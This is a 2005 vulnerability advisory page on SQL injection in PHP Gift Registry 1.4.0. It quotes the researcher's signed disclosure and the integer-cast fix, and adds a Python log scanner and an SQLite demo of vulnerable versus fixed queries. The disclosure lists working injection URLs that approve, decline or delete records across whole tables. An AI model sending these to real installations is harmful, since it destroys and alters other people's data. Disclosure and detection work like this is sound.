SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Generic)  >   phpGiftReq
Vendors:   phpgiftreg.sourceforge.net
PHP Gift Registry Parameter Input Validation Hole Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1012910
SecurityTracker URL:  http://securitytracker.com/id/1012910
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 16 2005
Impact:   Disclosure of system information, Disclosure of user information, Modification of user information
Exploit Included:  Yes  
Version(s): 1.4.0
Description:   Madelman reported an input validation vulnerability in PHP Gift Registry (phpGiftReq). A remote user can inject SQL commands.

The script does not properly validate user-supplied input. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1

http://[target]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1

http://[target]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1

http://[target]/phpgiftreg/index.php?action=request&shopfor=3%2c0%29%2c%2899%2c100

http://[target]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1

http://[target]/phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1

Other parameters and functions may also be affected.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  phpgiftreg.sourceforge.net/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
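The entry above lists the request URLs that were used to demonstrate the hole. From a detection standpoint, each one is visible in ordinary web-server access logs as a non-numeric value supplied to a parameter the application treats as an integer ID. The following scanner is an added example, not part of the SecurityTracker entry or the original advisory; it takes the four parameter names from the URLs above (messageid, shopper, shopfor, itemid) and runs over a few constructed Common Log Format lines, percent-decoding the query string so that %20OR%201%3d1 is inspected as "2 OR 1=1".

```python
# Added example: flag phpGiftReq requests whose integer-ID parameters carry
# non-integer values, the pattern described in the SecurityTracker entry.
# The parameter names come from the advisory's URLs; the log lines are constructed.
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory shows being used as integer IDs in SQL.
INTEGER_PARAMS = {"messageid", "shopper", "shopfor", "itemid"}

# Common Log Format: client ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def suspicious_params(request_path):
    """Return (name, decoded_value) pairs for integer-ID parameters that are not plain integers.

    parse_qsl percent-decodes values, so '2%20OR%201%3d1' is checked as '2 OR 1=1'.
    """
    query = urlsplit(request_path).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return one finding dict per request that carries a suspicious integer parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in Common Log Format; skip rather than guess
        client, ts, method, path, status = m.groups()
        hits = suspicious_params(path)
        if hits:
            findings.append({"client": client, "time": ts, "method": method,
                             "path": path, "status": int(status), "params": hits})
    return findings


# Constructed sample log: one benign request, two matching the advisory's URLs.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Jan/2005:10:01:02 +0100] "GET /phpgiftreg/index.php?action=ack&messageid=2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [16/Jan/2005:10:01:07 +0100] "GET /phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [16/Jan/2005:10:01:09 +0100] "GET /phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1 HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} -> {f['params']}")
```

Because the check is "value is not an integer" rather than a signature for a specific payload, it also catches the comma and parenthesis variant used against the shopfor parameter, and any other non-numeric value sent to those IDs.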


Source Message Contents

Subject:  phpGiftReq SQL Injection


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: phpGiftReq SQL Injection
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 16/01/2005
Severity: Moderately critical

Summary:
--------

The PHP Gift Registry is a web-enabled gift registry intended for use
among a circle of family members or friends
(from vendor site: http://phpgiftreg.sourceforge.net/)

phpGiftReq doesn't validate the parameters. This allows SQL Injection
and modification of data in the database.

This vulnerability has been tested with phpGiftReq 1.4.0.

Details:
--------

Acknowledge all messages
http://[SERVER]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1

Approve all pending requests
http://[SERVER]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1

Decline all pending requests
http://[SERVER]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1

Inserts current shopper for buying to user 3 without need for approval
http://[SERVER]/phpgiftreg/index.php?action=request&shopfor=3%2c0%29%2c%2899%2c100

Delete all data from table shoppers
http://[SERVER]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1

Delete all data from table items
http://[SERVER]/phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1

I'm fairly sure there are a lot more places where SQL can be injected,
but I don't have time to check them all.


Solution:
---------

All parameters should be converted to integers before creating the query.

Example:

Substitute

if ($action == "ack") {
    $query = "UPDATE messages SET isread = 1 WHERE messageid = " . $_GET["messageid"];
    mysql_query($query) or die("Could not query: " . mysql_error());
}

with

if ($action == "ack") {
    $query = "UPDATE messages SET isread = 1 WHERE messageid = " . ((int) $_GET["messageid"]);
    mysql_query($query) or die("Could not query: " . mysql_error());
}


Timeline
--------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFB6qif3RWooxY20cIRAmSdAKCJEpPvYyfMpLC0YVP0XMz7OK7maQCcDZOC
DI/zEDH+ORCaUt2uvRiL1eo=
=44JS
-----END PGP SIGNATURE-----
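The Solution section of the advisory shows the raw concatenation and the integer-cast fix in PHP. The block below is an added example, not code from the advisory or from phpGiftReq: it reproduces the same "ack" update against a constructed in-memory SQLite table (the real application is PHP on MySQL) so that the effect of the decoded payload "2 OR 1=1" can be measured as rows affected. It runs three variants: the vulnerable concatenation, the advisory's fix with PHP's (int) semantics mimicked by a small helper (leading digits are kept, anything else becomes 0), and a stricter variant that rejects non-integer input and binds the value as a query parameter. The table layout and helper names are assumptions for the demonstration.

```python
# Added example: the advisory's vulnerable query, its (int) cast fix, and a
# parameterized alternative, measured against a constructed SQLite table.
import re
import sqlite3


def make_db():
    """Constructed 'messages' table with three unread rows (ids 1, 2, 3)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (messageid INTEGER PRIMARY KEY, isread INTEGER)")
    conn.executemany("INSERT INTO messages VALUES (?, 0)", [(1,), (2,), (3,)])
    conn.commit()
    return conn


def ack_vulnerable(conn, messageid):
    """Mirror of the original code: the raw parameter is concatenated into the SQL text."""
    query = "UPDATE messages SET isread = 1 WHERE messageid = " + messageid
    cur = conn.execute(query)
    conn.commit()
    return cur.rowcount  # rows the UPDATE touched


def php_int_cast(value):
    """Mimic PHP's (int) cast on a string: leading integer is kept, otherwise 0 (assumption)."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def ack_int_cast(conn, messageid):
    """The advisory's fix: cast to integer before the query is built."""
    safe_id = php_int_cast(messageid)
    cur = conn.execute(f"UPDATE messages SET isread = 1 WHERE messageid = {safe_id}")
    conn.commit()
    return cur.rowcount


def ack_parameterized(conn, messageid):
    """Stricter variant: reject anything that is not an integer literal, then bind it."""
    if not re.fullmatch(r"-?\d+", messageid):
        raise ValueError(f"messageid must be an integer, got {messageid!r}")
    cur = conn.execute("UPDATE messages SET isread = 1 WHERE messageid = ?", (int(messageid),))
    conn.commit()
    return cur.rowcount


def demo(payload):
    """Rows affected by each variant for one decoded parameter value."""
    results = {"vulnerable": ack_vulnerable(make_db(), payload),
               "int_cast": ack_int_cast(make_db(), payload)}
    try:
        results["parameterized"] = ack_parameterized(make_db(), payload)
    except ValueError:
        results["parameterized"] = "rejected"
    return results


if __name__ == "__main__":
    # "2 OR 1=1" is the decoded form of messageid=2%20OR%201%3d1 from the advisory.
    for value in ("2", "2 OR 1=1"):
        print(f"messageid={value!r}: {demo(value)}")
```

The vulnerable variant marks all three rows read for the injected value, the cast variant touches only message 2 (the cast silently discards the rest of the string, which is why the advisory's fix is sufficient against this class of payload), and the parameterized variant refuses the request outright, which is the behaviour to prefer when the parameter is also logged or shown to the user.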

Copyright 2022, SecurityGlobal.net LLC